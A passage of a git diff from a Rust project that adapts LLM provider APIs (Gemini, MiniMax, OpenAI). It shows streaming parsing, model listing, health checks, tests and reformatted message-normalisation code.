yield Ok(StreamEvent::InputJsonDelta { + index: idx, + partial_json: args_str, + }); + } + } + } + + // Handle finish reason. + let finish_reason = candidate + .get("finishReason") + .and_then(|r| r.as_str()) + .unwrap_or(""); + + if !finish_reason.is_empty() + && finish_reason != "FINISH_REASON_UNSPECIFIED" + { + // Close text block. + yield Ok(StreamEvent::ContentBlockStop { + index: text_block_index, + }); + + // Close tool call blocks. + let mut tool_indices: Vec = + open_tool_calls + .values() + .map(|(idx, _, _)| *idx) + .collect(); + tool_indices.sort_unstable(); + for idx in tool_indices { + yield Ok(StreamEvent::ContentBlockStop { index: idx }); + } + open_tool_calls.clear(); + + let stop_reason = match finish_reason { + "STOP" => Some(StopReason::EndTurn), + "MAX_TOKENS" => Some(StopReason::MaxTokens), + "SAFETY" | "RECITATION" => Some(StopReason::ContentFiltered), + "TOOL_CODE" | "FUNCTION_CALL" => Some(StopReason::ToolUse), + other => Some(StopReason::Other(other.to_string())), + }; + + let meta = parsed.get("usageMetadata"); + let final_usage = UsageInfo { + input_tokens: meta + .and_then(|m| m.get("promptTokenCount")) + .and_then(|v| v.as_u64()) + .unwrap_or(0), + output_tokens: meta + .and_then(|m| m.get("candidatesTokenCount")) + .and_then(|v| v.as_u64()) + .unwrap_or(0), + cache_creation_input_tokens: 0, + cache_read_input_tokens: 0, + }; + + yield Ok(StreamEvent::MessageDelta { + stop_reason, + usage: Some(final_usage), + }); + yield Ok(StreamEvent::MessageStop); + } + } + } + // SSE comment lines (": ...") and blank lines are ignored. + } + } + }; + + Ok(Box::pin(stream)) + } + + async fn list_models(&self) -> Result, ProviderError> { + let url = format!("{}/v1beta/models?key={}", self.base_url, self.api_key); + + let resp = self + .http_client + .get(&url) + .header("x-goog-api-key", &self.api_key) + .send() + .await + .map_err(|e| ProviderError::ServerError { + provider: self.id.clone(), + status: None, + message: e.to_string(), + is_retryable: true, + })?; + + let status = resp.status().as_u16(); + let body_text = resp.text().await.map_err(|e| ProviderError::ServerError { + provider: self.id.clone(), + status: Some(status), + message: e.to_string(), + is_retryable: true, + })?; + + if status >= 400 { + return Err(self.parse_error_response(status, &body_text)); + } + + let body: Value = serde_json::from_str(&body_text).map_err(|e| ProviderError::Other { + provider: self.id.clone(), + message: format!("Failed to parse models list JSON: {}", e), + status: Some(status), + body: Some(body_text.clone()), + })?; + + let models_array = body + .get("models") + .and_then(|m| m.as_array()) + .cloned() + .unwrap_or_default(); + + let provider_id = self.id.clone(); + let models: Vec = models_array + .iter() + .filter_map(|m| { + let name = m.get("name").and_then(|n| n.as_str())?; + // Only include Gemini models (filter out palm, embedding, etc.) + if !name.starts_with("models/gemini-") { + return None; + } + // Strip the "models/" prefix for the model ID. + let model_id = name.strip_prefix("models/").unwrap_or(name); + let display = m + .get("displayName") + .and_then(|d| d.as_str()) + .unwrap_or(model_id) + .to_string(); + let input_limit = m + .get("inputTokenLimit") + .and_then(|v| v.as_u64()) + .unwrap_or(32_768) as u32; + let output_limit = m + .get("outputTokenLimit") + .and_then(|v| v.as_u64()) + .unwrap_or(8_192) as u32; + + Some(ModelInfo { + id: ModelId::new(model_id), + provider_id: provider_id.clone(), + name: display, + context_window: input_limit, + max_output_tokens: output_limit, + }) + }) + .collect(); + + Ok(models) + } + + async fn health_check(&self) -> Result { + // Use list_models as a lightweight liveness check. + match self.list_models().await { + Ok(models) if !models.is_empty() => Ok(ProviderStatus::Healthy), + Ok(_) => Ok(ProviderStatus::Degraded { + reason: "No Gemini models returned".to_string(), + }), + Err(ProviderError::AuthFailed { message, .. }) => Err(ProviderError::AuthFailed { + provider: self.id.clone(), + message, + }), + Err(e) => Ok(ProviderStatus::Unavailable { + reason: e.to_string(), + }), + } + } + + fn capabilities(&self) -> ProviderCapabilities { + ProviderCapabilities { + streaming: true, + tool_calling: true, + thinking: true, + image_input: true, + pdf_input: true, + audio_input: false, + video_input: true, + caching: false, + structured_output: true, + system_prompt_style: SystemPromptStyle::SystemInstruction, + } + } +} + +// --------------------------------------------------------------------------- +// Helpers +// --------------------------------------------------------------------------- + +/// Generate a simple pseudo-random hex ID without pulling in the uuid crate. +/// Uses a combination of the current time and a thread-local counter. +fn uuid_v4_simple() -> String { + use std::time::{SystemTime, UNIX_EPOCH}; + let t = SystemTime::now() + .duration_since(UNIX_EPOCH) + .map(|d| d.as_nanos()) + .unwrap_or(0); + // Simple hash mix to spread bits. + let a = t ^ (t >> 17) ^ (t << 13); + let b = a.wrapping_mul(0x517cc1b727220a95); + format!("{:032x}", b) +} + +#[cfg(test)] +mod tests { + use super::*; + use claurst_core::types::Message; + use serde_json::json; + + fn test_request(messages: Vec) -> ProviderRequest { + ProviderRequest { + model: "gemini-3-flash-preview".to_string(), + messages, + system_prompt: None, + tools: vec![], + max_tokens: 512, + temperature: None, + top_p: None, + top_k: None, + stop_sequences: vec![], + thinking: None, + provider_options: json!({}), + } + } + + #[test] + fn build_request_body_uses_function_names_for_tool_results() { + let provider = GoogleProvider::new("test".to_string()); + let request = test_request(vec![ + Message::assistant_blocks(vec![ContentBlock::ToolUse { + id: "call_search_2".to_string(), + name: "search".to_string(), + input: json!({"q": "cats"}), + }]), + Message::user_blocks(vec![ContentBlock::ToolResult { + tool_use_id: "call_search_2".to_string(), + content: ToolResultContent::Text("ok".to_string()), + is_error: Some(false), + }]), + ]); + + let body = provider.build_request_body(&request); + let contents = body["contents"].as_array().expect("contents array"); + assert_eq!(contents.len(), 2); + assert_eq!( + contents[1]["parts"][0]["functionResponse"]["name"], + json!("search") + ); + } + + #[test] + fn build_request_body_preserves_tool_result_order() { + let provider = GoogleProvider::new("test".to_string()); + let request = test_request(vec![Message::user_blocks(vec![ + ContentBlock::Text { + text: "before".to_string(), + }, + ContentBlock::ToolResult { + tool_use_id: "call_search".to_string(), + content: ToolResultContent::Text("done".to_string()), + is_error: Some(false), + }, + ContentBlock::Text { + text: "after".to_string(), + }, + ])]); + + let body = provider.build_request_body(&request); + let contents = body["contents"].as_array().expect("contents array"); + assert_eq!(contents.len(), 3); + assert_eq!(contents[0]["role"], json!("user")); + assert_eq!(contents[0]["parts"][0]["text"], json!("before")); + assert_eq!( + contents[1]["parts"][0]["functionResponse"]["name"], + json!("search") + ); + assert_eq!(contents[2]["parts"][0]["text"], json!("after")); + } + + #[test] + fn parse_response_body_assigns_unique_ids_for_duplicate_tool_names() { + let provider = GoogleProvider::new("test".to_string()); + let response = json!({ + "candidates": [{ + "finishReason": "FUNCTION_CALL", + "content": { + "parts": [ + { "functionCall": { "name": "search", "args": { "q": "a" } } }, + { "functionCall": { "name": "search", "args": { "q": "b" } } } + ] + } + }], + "usageMetadata": {} + }); + + let parsed = provider + .parse_response_body(&response, "gemini-3-flash-preview") + .expect("parsed response"); + + assert!(matches!( + &parsed.content[0], + ContentBlock::ToolUse { id, .. } if id == "call_search" + )); + assert!(matches!( + &parsed.content[1], + ContentBlock::ToolUse { id, .. } if id == "call_search_2" + )); + } +} diff --git a/src-rust/crates/api/src/providers/message_normalization.rs b/src-rust/crates/api/src/providers/message_normalization.rs index 155a3e0..d4c75db 100644 --- a/src-rust/crates/api/src/providers/message_normalization.rs +++ b/src-rust/crates/api/src/providers/message_normalization.rs @@ -1,150 +1,147 @@ -use claurst_core::types::{ContentBlock, Message, MessageContent}; - -pub(crate) fn remove_empty_messages(messages: &[Message]) -> Vec { - messages - .iter() - .filter_map(remove_empty_message) - .collect() -} - -pub(crate) fn normalize_anthropic_messages(messages: &[Message]) -> Vec { - scrub_tool_ids(&remove_empty_messages(messages), scrub_anthropic_tool_id) -} - -pub(crate) fn scrub_tool_ids(messages: &[Message], scrub: F) -> Vec -where - F: Fn(&str) -> String + Copy, -{ - messages - .iter() - .cloned() - .map(|mut message| { - if let MessageContent::Blocks(blocks) = &mut message.content { - for block in blocks.iter_mut() { - match block { - ContentBlock::ToolUse { id, .. } => { - *id = scrub(id); - } - ContentBlock::ToolResult { tool_use_id, .. } => { - *tool_use_id = scrub(tool_use_id); - } - _ => {} - } - } - } - message - }) - .collect() -} - -pub(crate) fn scrub_anthropic_tool_id(id: &str) -> String { - id.chars() - .map(|ch| { - if ch.is_ascii_alphanumeric() || ch == '_' || ch == '-' { - ch - } else { - '_' - } - }) - .collect() -} - -fn remove_empty_message(message: &Message) -> Option { - match &message.content { - MessageContent::Text(text) if text.is_empty() => None, - MessageContent::Text(_) => Some(message.clone()), - MessageContent::Blocks(blocks) => { - let filtered: Vec = - blocks.iter().filter_map(remove_empty_block).collect(); - if filtered.is_empty() { - None - } else { - let mut cloned = message.clone(); - cloned.content = MessageContent::Blocks(filtered); - Some(cloned) - } - } - } -} - -fn remove_empty_block(block: &ContentBlock) -> Option { - match block { - ContentBlock::Text { text } if text.is_empty() => None, - ContentBlock::Thinking { thinking, .. } if thinking.is_empty() => None, - _ => Some(block.clone()), - } -} - -#[cfg(test)] -mod tests { - use super::*; - use claurst_core::types::{Message, Role, ToolResultContent}; - use serde_json::json; - - #[test] - fn remove_empty_messages_filters_empty_text_and_thinking() { - let messages = vec![ - Message::user(""), - Message::assistant_blocks(vec![ - ContentBlock::Text { - text: String::new(), - }, - ContentBlock::Thinking { - thinking: String::new(), - signature: "sig".to_string(), - }, - ]), - Message::user_blocks(vec![ - ContentBlock::Text { - text: "kept".to_string(), - }, - ContentBlock::Thinking { - thinking: String::new(), - signature: "sig".to_string(), - }, - ]), - ]; - - let normalized = remove_empty_messages(&messages); - assert_eq!(normalized.len(), 1); - assert!(matches!(&normalized[0].role, Role::User)); - let MessageContent::Blocks(blocks) = &normalized[0].content else { - panic!("expected block message"); - }; - assert_eq!(blocks.len(), 1); - assert!(matches!(&blocks[0], ContentBlock::Text { text } if text == "kept")); - } - - #[test] - fn normalize_anthropic_messages_scrubs_tool_ids() { - let messages = vec![ - Message::assistant_blocks(vec![ContentBlock::ToolUse { - id: "call:1/abc".to_string(), - name: "search".to_string(), - input: json!({"q": "test"}), - }]), - Message::user_blocks(vec![ContentBlock::ToolResult { - tool_use_id: "call:1/abc".to_string(), - content: ToolResultContent::Text("done".to_string()), - is_error: Some(false), - }]), - ]; - - let normalized = normalize_anthropic_messages(&messages); - let MessageContent::Blocks(assistant_blocks) = &normalized[0].content else { - panic!("expected assistant blocks"); - }; - let MessageContent::Blocks(user_blocks) = &normalized[1].content else { - panic!("expected user blocks"); - }; - - assert!(matches!( - &assistant_blocks[0], - ContentBlock::ToolUse { id, .. } if id == "call_1_abc" - )); - assert!(matches!( - &user_blocks[0], - ContentBlock::ToolResult { tool_use_id, .. } if tool_use_id == "call_1_abc" - )); - } -} +use claurst_core::types::{ContentBlock, Message, MessageContent}; + +pub(crate) fn remove_empty_messages(messages: &[Message]) -> Vec { + messages.iter().filter_map(remove_empty_message).collect() +} + +pub(crate) fn normalize_anthropic_messages(messages: &[Message]) -> Vec { + scrub_tool_ids(&remove_empty_messages(messages), scrub_anthropic_tool_id) +} + +pub(crate) fn scrub_tool_ids(messages: &[Message], scrub: F) -> Vec +where + F: Fn(&str) -> String + Copy, +{ + messages + .iter() + .cloned() + .map(|mut message| { + if let MessageContent::Blocks(blocks) = &mut message.content { + for block in blocks.iter_mut() { + match block { + ContentBlock::ToolUse { id, .. } => { + *id = scrub(id); + } + ContentBlock::ToolResult { tool_use_id, .. } => { + *tool_use_id = scrub(tool_use_id); + } + _ => {} + } + } + } + message + }) + .collect() +} + +pub(crate) fn scrub_anthropic_tool_id(id: &str) -> String { + id.chars() + .map(|ch| { + if ch.is_ascii_alphanumeric() || ch == '_' || ch == '-' { + ch + } else { + '_' + } + }) + .collect() +} + +fn remove_empty_message(message: &Message) -> Option { + match &message.content { + MessageContent::Text(text) if text.is_empty() => None, + MessageContent::Text(_) => Some(message.clone()), + MessageContent::Blocks(blocks) => { + let filtered: Vec = + blocks.iter().filter_map(remove_empty_block).collect(); + if filtered.is_empty() { + None + } else { + let mut cloned = message.clone(); + cloned.content = MessageContent::Blocks(filtered); + Some(cloned) + } + } + } +} + +fn remove_empty_block(block: &ContentBlock) -> Option { + match block { + ContentBlock::Text { text } if text.is_empty() => None, + ContentBlock::Thinking { thinking, .. } if thinking.is_empty() => None, + _ => Some(block.clone()), + } +} + +#[cfg(test)] +mod tests { + use super::*; + use claurst_core::types::{Message, Role, ToolResultContent}; + use serde_json::json; + + #[test] + fn remove_empty_messages_filters_empty_text_and_thinking() { + let messages = vec![ + Message::user(""), + Message::assistant_blocks(vec![ + ContentBlock::Text { + text: String::new(), + }, + ContentBlock::Thinking { + thinking: String::new(), + signature: "sig".to_string(), + }, + ]), + Message::user_blocks(vec![ + ContentBlock::Text { + text: "kept".to_string(), + }, + ContentBlock::Thinking { + thinking: String::new(), + signature: "sig".to_string(), + }, + ]), + ]; + + let normalized = remove_empty_messages(&messages); + assert_eq!(normalized.len(), 1); + assert!(matches!(&normalized[0].role, Role::User)); + let MessageContent::Blocks(blocks) = &normalized[0].content else { + panic!("expected block message"); + }; + assert_eq!(blocks.len(), 1); + assert!(matches!(&blocks[0], ContentBlock::Text { text } if text == "kept")); + } + + #[test] + fn normalize_anthropic_messages_scrubs_tool_ids() { + let messages = vec![ + Message::assistant_blocks(vec![ContentBlock::ToolUse { + id: "call:1/abc".to_string(), + name: "search".to_string(), + input: json!({"q": "test"}), + }]), + Message::user_blocks(vec![ContentBlock::ToolResult { + tool_use_id: "call:1/abc".to_string(), + content: ToolResultContent::Text("done".to_string()), + is_error: Some(false), + }]), + ]; + + let normalized = normalize_anthropic_messages(&messages); + let MessageContent::Blocks(assistant_blocks) = &normalized[0].content else { + panic!("expected assistant blocks"); + }; + let MessageContent::Blocks(user_blocks) = &normalized[1].content else { + panic!("expected user blocks"); + }; + + assert!(matches!( + &assistant_blocks[0], + ContentBlock::ToolUse { id, .. } if id == "call_1_abc" + )); + assert!(matches!( + &user_blocks[0], + ContentBlock::ToolResult { tool_use_id, .. } if tool_use_id == "call_1_abc" + )); + } +} diff --git a/src-rust/crates/api/src/providers/minimax.rs b/src-rust/crates/api/src/providers/minimax.rs index 30aaf52..d0d29b1 100644 --- a/src-rust/crates/api/src/providers/minimax.rs +++ b/src-rust/crates/api/src/providers/minimax.rs @@ -8,7 +8,7 @@ use async_trait::async_trait; use claurst_core::provider_id::{ModelId, ProviderId}; use claurst_core::types::{ContentBlock, UsageInfo}; use futures::Stream; -use reqwest::{Client, header}; +use reqwest::{header, Client}; use serde_json::Value; use crate::provider::{LlmProvider, ModelInfo}; @@ -33,7 +33,11 @@ impl MinimaxProvider { let api_base = std::env::var("MINIMAX_BASE_URL") .unwrap_or_else(|_| "https://api.minimax.io/anthropic".to_string()); let mut headers = header::HeaderMap::new(); - headers.insert("X-Api-Key", header::HeaderValue::from_str(&api_key).expect("unable to parse api key for http header")); + headers.insert( + "X-Api-Key", + header::HeaderValue::from_str(&api_key) + .expect("unable to parse api key for http header"), + ); let http_client = Client::builder() .default_headers(headers) .timeout(std::time::Duration::from_secs(600)) @@ -50,10 +54,8 @@ impl MinimaxProvider { fn build_request(request: &ProviderRequest) -> CreateMessageRequest { let normalized_messages = normalize_anthropic_messages(&request.messages); - let api_messages: Vec = normalized_messages - .iter() - .map(ApiMessage::from) - .collect(); + let api_messages: Vec = + normalized_messages.iter().map(ApiMessage::from).collect(); let api_tools: Option> = if request.tools.is_empty() { None @@ -109,7 +111,11 @@ impl MinimaxProvider { let id = value.get("message")?.get("id")?.as_str()?.to_string(); let model = value.get("message")?.get("model")?.as_str()?.to_string(); let usage = UsageInfo { - input_tokens: value.get("message")?.get("usage")?.get("input_tokens")?.as_u64()?, + input_tokens: value + .get("message")? + .get("usage")? + .get("input_tokens")? + .as_u64()?, output_tokens: 0, cache_creation_input_tokens: 0, cache_read_input_tokens: 0, @@ -126,7 +132,11 @@ impl MinimaxProvider { }, "tool_use" => { let id = value.get("content_block")?.get("id")?.as_str()?.to_string(); - let name = value.get("content_block")?.get("name")?.as_str()?.to_string(); + let name = value + .get("content_block")? + .get("name")? + .as_str()? + .to_string(); ContentBlock::ToolUse { id, name, @@ -136,7 +146,10 @@ impl MinimaxProvider { _ => return None, }; - Some(StreamEvent::ContentBlockStart { index, content_block }) + Some(StreamEvent::ContentBlockStart { + index, + content_block, + }) } "content_block_delta" => { let index = value.get("index")?.as_u64()? as usize; @@ -156,8 +169,15 @@ impl MinimaxProvider { Some(StreamEvent::SignatureDelta { index, signature }) } "input_json_delta" => { - let partial_json = value.get("delta")?.get("partial_json")?.as_str()?.to_string(); - Some(StreamEvent::InputJsonDelta { index, partial_json }) + let partial_json = value + .get("delta")? + .get("partial_json")? + .as_str()? + .to_string(); + Some(StreamEvent::InputJsonDelta { + index, + partial_json, + }) } _ => None, } @@ -167,31 +187,37 @@ impl MinimaxProvider { Some(StreamEvent::ContentBlockStop { index }) } "message_delta" => { - let stop_reason = value.get("delta")? + let stop_reason = value + .get("delta")? .get("stop_reason")? .as_str() .map(Self::map_stop_reason); - let usage = value.get("delta")?.get("usage") - .and_then(|u| { - Some(UsageInfo { - input_tokens: u.get("input_tokens")?.as_u64()?, - output_tokens: u.get("output_tokens")?.as_u64()?, - cache_creation_input_tokens: u.get("cache_creation_input_tokens")?.as_u64().unwrap_or(0), - cache_read_input_tokens: u.get("cache_read_input_tokens")?.as_u64().unwrap_or(0), - }) - }); - - Some(StreamEvent::MessageDelta { - stop_reason, - usage, - }) + let usage = value.get("delta")?.get("usage").and_then(|u| { + Some(UsageInfo { + input_tokens: u.get("input_tokens")?.as_u64()?, + output_tokens: u.get("output_tokens")?.as_u64()?, + cache_creation_input_tokens: u + .get("cache_creation_input_tokens")? + .as_u64() + .unwrap_or(0), + cache_read_input_tokens: u + .get("cache_read_input_tokens")? + .as_u64() + .unwrap_or(0), + }) + }); + + Some(StreamEvent::MessageDelta { stop_reason, usage }) } "message_stop" => Some(StreamEvent::MessageStop), "error" => { let error_type = value.get("error")?.get("type")?.as_str()?.to_string(); let message = value.get("error")?.get("message")?.as_str()?.to_string(); - Some(StreamEvent::Error { error_type, message }) + Some(StreamEvent::Error { + error_type, + message, + }) } "ping" => None, _ => None, @@ -293,7 +319,10 @@ impl LlmProvider for MinimaxProvider { } } StreamEvent::MessageStop => break, - StreamEvent::Error { error_type, message } => { + StreamEvent::Error { + error_type, + message, + } => { return Err(ProviderError::StreamError { provider: self.id.clone(), message: format!("[{}] {}", error_type, message), @@ -331,13 +360,12 @@ impl LlmProvider for MinimaxProvider { { let api_request = Self::build_request(&request); - let body = serde_json::to_value(&api_request) - .map_err(|e| ProviderError::Other { - provider: self.id.clone(), - message: format!("Failed to serialize request: {}", e), - status: None, - body: None, - })?; + let body = serde_json::to_value(&api_request).map_err(|e| ProviderError::Other { + provider: self.id.clone(), + message: format!("Failed to serialize request: {}", e), + status: None, + body: None, + })?; let url = format!("{}/v1/messages", self.api_base); let api_key = self.api_key.clone(); @@ -442,15 +470,13 @@ impl LlmProvider for MinimaxProvider { async fn list_models(&self) -> Result, ProviderError> { let minimax_id = ProviderId::new(ProviderId::MINIMAX); - Ok(vec![ - ModelInfo { - id: ModelId::new("MiniMax-M2.7"), - provider_id: minimax_id.clone(), - name: "MiniMax-M2.7".to_string(), - context_window: 128_000, - max_output_tokens: 8192, - }, - ]) + Ok(vec![ModelInfo { + id: ModelId::new("MiniMax-M2.7"), + provider_id: minimax_id.clone(), + name: "MiniMax-M2.7".to_string(), + context_window: 128_000, + max_output_tokens: 8192, + }]) } async fn health_check(&self) -> Result { diff --git a/src-rust/crates/api/src/providers/openai.rs b/src-rust/crates/api/src/providers/openai.rs index fc52e3d..58acc64 100644 --- a/src-rust/crates/api/src/providers/openai.rs +++ b/src-rust/crates/api/src/providers/openai.rs @@ -1,1053 +1,1045 @@ -// providers/openai.rs — OpenAI Chat Completions provider adapter. -// -// Implements LlmProvider for the OpenAI Chat Completions API (POST -// /v1/chat/completions). Works equally well for any OpenAI-compatible -// endpoint (e.g. Azure OpenAI, local Ollama, Together AI) by configuring -// `base_url`. -// -// Phase 2A implementation covers: -// - Request transformation (Anthropic internal types → OpenAI wire format) -// - Streaming via Server-Sent Events (data: {...}\n\n lines) -// - Non-streaming JSON response parsing -// - Tool-call support (request and response) -// - Model listing via GET /v1/models -// - Health check -// - ProviderCapabilities - -use std::pin::Pin; -use async_stream::stream; -use async_trait::async_trait; -use claurst_core::provider_id::{ModelId, ProviderId}; -use claurst_core::types::{ - ContentBlock, ImageSource, MessageContent, Role, ToolResultContent, UsageInfo, -}; -use futures::Stream; -use serde_json::{json, Value}; -use tracing::debug; - -use crate::error_handling::parse_error_response; -use crate::provider::{LlmProvider, ModelInfo}; -use crate::provider_error::ProviderError; -use crate::provider_types::{ - ProviderCapabilities, ProviderRequest, ProviderResponse, ProviderStatus, StopReason, - StreamEvent, SystemPromptStyle, -}; -use crate::provider_types::SystemPrompt; - -use super::request_options::merge_openai_compatible_options; - -// --------------------------------------------------------------------------- -// OpenAiProvider -// --------------------------------------------------------------------------- - -pub struct OpenAiProvider { - id: ProviderId, - name: String, - base_url: String, - api_key: String, - http_client: reqwest::Client, -} - -impl OpenAiProvider { - pub fn new(api_key: String) -> Self { - let http_client = reqwest::Client::builder() - .timeout(std::time::Duration::from_secs(600)) - .build() - .expect("failed to build reqwest client"); - - Self { - id: ProviderId::new(ProviderId::OPENAI), - name: "OpenAI".to_string(), - base_url: "https://api.openai.com".to_string(), - api_key, - http_client, - } - } - - /// Override the API base URL (e.g. for Azure, Ollama, or other compatible - /// endpoints). - pub fn with_base_url(mut self, url: String) -> Self { - self.base_url = url; - self - } - - /// Returns `true` if the model should use the Responses API instead of - /// Chat Completions (gpt-5+, o3, o4-mini). - fn use_responses_api(model: &str) -> bool { - model.starts_with("o3") - || model.starts_with("o4") - || model.starts_with("gpt-5") - } - - // ----------------------------------------------------------------------- - // Request transformation helpers - // ----------------------------------------------------------------------- - - /// Public wrapper for Azure/Copilot providers that share the OpenAI wire format. - pub fn to_openai_messages_pub( - messages: &[claurst_core::types::Message], - system_prompt: Option<&SystemPrompt>, - ) -> Vec { - Self::to_openai_messages(messages, system_prompt) - } - - /// Public wrapper for tool conversion used by Azure/Copilot providers. - pub fn to_openai_tools_pub(tools: &[claurst_core::types::ToolDefinition]) -> Vec { - Self::to_openai_tools(tools) - } - - /// Public wrapper for finish-reason mapping. - pub fn map_finish_reason_pub(reason: &str) -> StopReason { - Self::map_finish_reason(reason) - } - - /// Public wrapper for usage parsing. - pub fn parse_usage_pub(usage: Option<&Value>) -> UsageInfo { - Self::parse_usage(usage) - } - - /// Public wrapper for non-streaming response parsing. - pub fn parse_non_streaming_response_pub( - json: &Value, - provider_id: &claurst_core::provider_id::ProviderId, - ) -> Result { - Self::parse_non_streaming_response(json, provider_id) - } - - /// Convert a provider-agnostic [`ProviderRequest`] into the OpenAI Chat - /// Completions `messages` array. - fn to_openai_messages( - messages: &[claurst_core::types::Message], - system_prompt: Option<&SystemPrompt>, - ) -> Vec { - let mut result: Vec = Vec::new(); - - // System prompt goes first as a `system` role message. - if let Some(sys) = system_prompt { - let sys_text = match sys { - SystemPrompt::Text(t) => t.clone(), - SystemPrompt::Blocks(blocks) => blocks - .iter() - .map(|b| b.text.clone()) - .collect::>() - .join("\n"), - }; - result.push(json!({ "role": "system", "content": sys_text })); - } - - for msg in messages { - match msg.role { - Role::User => { - Self::append_user_messages(&mut result, &msg.content); - } - Role::Assistant => { - let (text_content, tool_calls) = - Self::assistant_content_to_openai(&msg.content); - let mut obj = serde_json::Map::new(); - obj.insert("role".into(), json!("assistant")); - if let Some(tc) = text_content { - obj.insert("content".into(), json!(tc)); - } else { - obj.insert("content".into(), Value::Null); - } - if !tool_calls.is_empty() { - obj.insert("tool_calls".into(), json!(tool_calls)); - } - result.push(Value::Object(obj)); - - // ToolResult blocks in an assistant message need to be - // emitted as separate `role: tool` messages. - let tool_results = Self::extract_tool_results(&msg.content); - result.extend(tool_results); - } - } - } - - result - } - - fn append_user_messages(result: &mut Vec, content: &MessageContent) { - match content { - MessageContent::Text(text) => { - result.push(json!({ "role": "user", "content": text })); - } - MessageContent::Blocks(blocks) => { - let mut user_parts: Vec = Vec::new(); - let flush_user_parts = |result: &mut Vec, parts: &mut Vec| { - if !parts.is_empty() { - result.push(json!({ - "role": "user", - "content": std::mem::take(parts), - })); - } - }; - - for block in blocks { - if let Some(tool_result) = Self::tool_result_to_openai_message(block) { - flush_user_parts(result, &mut user_parts); - result.push(tool_result); - } else if let Some(part) = Self::user_block_to_openai_part(block) { - user_parts.push(part); - } - } - - flush_user_parts(result, &mut user_parts); - } - } - } - - fn user_block_to_openai_part(block: &ContentBlock) -> Option { - match block { - ContentBlock::Text { text } => { - Some(json!({ "type": "text", "text": text })) - } - ContentBlock::Image { source } => { - let url = Self::image_source_to_url(source); - Some(json!({ - "type": "image_url", - "image_url": { "url": url } - })) - } - ContentBlock::ToolResult { tool_use_id, content, is_error } => { - // Tool results become separate `role: tool` messages at the - // conversation level — handled in append_user_messages. - let _ = (tool_use_id, content, is_error); - None - } - // Thinking, RedactedThinking, etc. are not supported by OpenAI. - _ => None, - } - } - - fn image_source_to_url(source: &ImageSource) -> String { - if let Some(url) = &source.url { - return url.clone(); - } - // base64-encoded image - let media_type = source - .media_type - .as_deref() - .unwrap_or("image/png"); - let data = source.data.as_deref().unwrap_or(""); - format!("data:{};base64,{}", media_type, data) - } - - /// Split assistant content blocks into (text_string, tool_calls_array). - fn assistant_content_to_openai( - content: &MessageContent, - ) -> (Option, Vec) { - let blocks = match content { - MessageContent::Text(t) => return (Some(t.clone()), vec![]), - MessageContent::Blocks(b) => b, - }; - - let mut text_parts: Vec<&str> = Vec::new(); - let mut tool_calls: Vec = Vec::new(); - - for block in blocks { - match block { - ContentBlock::Text { text } => { - text_parts.push(text.as_str()); - } - ContentBlock::ToolUse { id, name, input } => { - let args = serde_json::to_string(input).unwrap_or_default(); - tool_calls.push(json!({ - "id": id, - "type": "function", - "function": { - "name": name, - "arguments": args - } - })); - } - // Thinking is dropped — not supported by OpenAI. - _ => {} - } - } - - let text_content = if text_parts.is_empty() { - None - } else { - Some(text_parts.join("")) - }; - - (text_content, tool_calls) - } - - /// Collect any ToolResult blocks and emit them as `role: tool` messages. - fn extract_tool_results(content: &MessageContent) -> Vec { - let blocks = match content { - MessageContent::Text(_) => return vec![], - MessageContent::Blocks(b) => b, - }; - - blocks - .iter() - .filter_map(Self::tool_result_to_openai_message) - .collect() - } - - fn tool_result_to_openai_message(block: &ContentBlock) -> Option { - let ContentBlock::ToolResult { - tool_use_id, - content, - .. - } = block - else { - return None; - }; - - let text = match content { - ToolResultContent::Text(t) => t.clone(), - ToolResultContent::Blocks(inner) => inner - .iter() - .filter_map(|b| { - if let ContentBlock::Text { text } = b { - Some(text.as_str()) - } else { - None - } - }) - .collect::>() - .join("\n"), - }; - - Some(json!({ - "role": "tool", - "tool_call_id": tool_use_id, - "content": text, - })) - } - - /// Convert tool definitions to the OpenAI `tools` array format. - fn to_openai_tools( - tools: &[claurst_core::types::ToolDefinition], - ) -> Vec { - tools - .iter() - .map(|td| { - json!({ - "type": "function", - "function": { - "name": td.name, - "description": td.description, - "parameters": td.input_schema - } - }) - }) - .collect() - } - - // ----------------------------------------------------------------------- - // HTTP helpers - // ----------------------------------------------------------------------- - - fn auth_header(&self) -> (&'static str, String) { - ("Authorization", format!("Bearer {}", self.api_key)) - } - - fn map_http_error(&self, status: u16, body: &str) -> ProviderError { - parse_error_response(status, body, &self.id) - } - - // ----------------------------------------------------------------------- - // Non-streaming create_message - // ----------------------------------------------------------------------- - - async fn create_message_non_streaming( - &self, - request: &ProviderRequest, - ) -> Result { - let messages = Self::to_openai_messages( - &request.messages, - request.system_prompt.as_ref(), - ); - let tools = Self::to_openai_tools(&request.tools); - - let mut body = json!({ - "model": request.model, - "max_tokens": request.max_tokens, - "messages": messages, - "stream": false, - "store": false, - }); - - if !tools.is_empty() { - body["tools"] = json!(tools); - } - if let Some(t) = request.temperature { - body["temperature"] = json!(t); - } - if let Some(p) = request.top_p { - body["top_p"] = json!(p); - } - if !request.stop_sequences.is_empty() { - body["stop"] = json!(request.stop_sequences); - } - merge_openai_compatible_options(&mut body, &request.provider_options); - - let (auth_key, auth_val) = self.auth_header(); - let url = format!("{}/v1/chat/completions", self.base_url); - - let resp = self - .http_client - .post(&url) - .header(auth_key, auth_val) - .header("Content-Type", "application/json") - .json(&body) - .send() - .await - .map_err(|e| ProviderError::Other { - provider: self.id.clone(), - message: format!("HTTP request failed: {}", e), - status: None, - body: None, - })?; - - let status = resp.status().as_u16(); - let text = resp.text().await.map_err(|e| ProviderError::Other { - provider: self.id.clone(), - message: format!("Failed to read response body: {}", e), - status: Some(status), - body: None, - })?; - - if !(200..300).contains(&(status as usize)) { - return Err(self.map_http_error(status, &text)); - } - - let json: Value = - serde_json::from_str(&text).map_err(|e| ProviderError::Other { - provider: self.id.clone(), - message: format!("Failed to parse response JSON: {}", e), - status: Some(status), - body: Some(text.clone()), - })?; - - Self::parse_non_streaming_response(&json, &self.id) - } - - fn parse_non_streaming_response( - json: &Value, - provider_id: &ProviderId, - ) -> Result { - let id = json - .get("id") - .and_then(|v| v.as_str()) - .unwrap_or("unknown") - .to_string(); - let model = json - .get("model") - .and_then(|v| v.as_str()) - .unwrap_or("") - .to_string(); - - let choice = json - .get("choices") - .and_then(|c| c.as_array()) - .and_then(|a| a.first()) - .ok_or_else(|| ProviderError::Other { - provider: provider_id.clone(), - message: "No choices in response".to_string(), - status: None, - body: None, - })?; - - let message = choice.get("message").ok_or_else(|| ProviderError::Other { - provider: provider_id.clone(), - message: "No message in choice".to_string(), - status: None, - body: None, - })?; - - let mut content_blocks: Vec = Vec::new(); - - // Text content - if let Some(text) = message.get("content").and_then(|c| 